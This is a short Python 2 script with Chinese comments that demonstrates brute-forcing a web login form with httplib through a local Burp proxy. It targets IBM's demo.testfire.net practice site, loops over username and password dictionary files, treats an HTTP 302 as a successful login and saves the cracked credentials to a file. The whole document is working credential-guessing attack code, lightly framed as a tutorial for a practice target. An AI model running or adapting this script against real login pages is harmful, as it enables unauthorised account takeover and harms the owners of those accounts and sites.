httplib:
包含了 httplib爆破 web 的 form 表单的使用方法
httplib 中代理的添加方法
# -*- coding: utf-8 -*-
import urllib
import httplib
import re
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded",
"Referer": "http://demo.testfire.net/bank/login.aspx"}
def brute_force(user, password):
#添加代理
conn = httplib.HTTPConnection("localhost","8080") # 代理,本地 burp 监听一个8080端口,目的是查看发包和回包的情况
data = {'uid': user, 'passw': password,'btnSubmit':'Login'}
params = urllib.urlencode(data)
#测试网站为 IBM 的靶机网站
page = conn.request("POST", "http://demo.testfire.net/bank/login.aspx", params, headers=headers) # request页面
response = conn.getresponse()#返回的页面
status = response.status
if status==302:
print '---- find user:', user, ' with password:',password, '-----'+'\n'
outFile.write(user + ':' + password + '\n')
else:
print '----- error user:', user.replace('\n',''), ' with password:',password.replace('\n','') , '-----'
return
outFile = open('accounts-cracked.txt', 'w')
if __name__ == '__main__':
with open('user.dic', 'r') as userline:
y = userline.readlines()
with open('pass.dic', 'r') as passline:
b= passline.readlines()
for u in y:
for p in b:
brute_force(user=u.replace('\n',''),password=p.replace('\n',''))
outFile.close()
with open('accounts-cracked.txt','r') as text:
list = text.readlines()
sum=len(list)
if sum>0:
print "找到",sum,"个账号密码"
else:
print "All thread OK,maybe not "
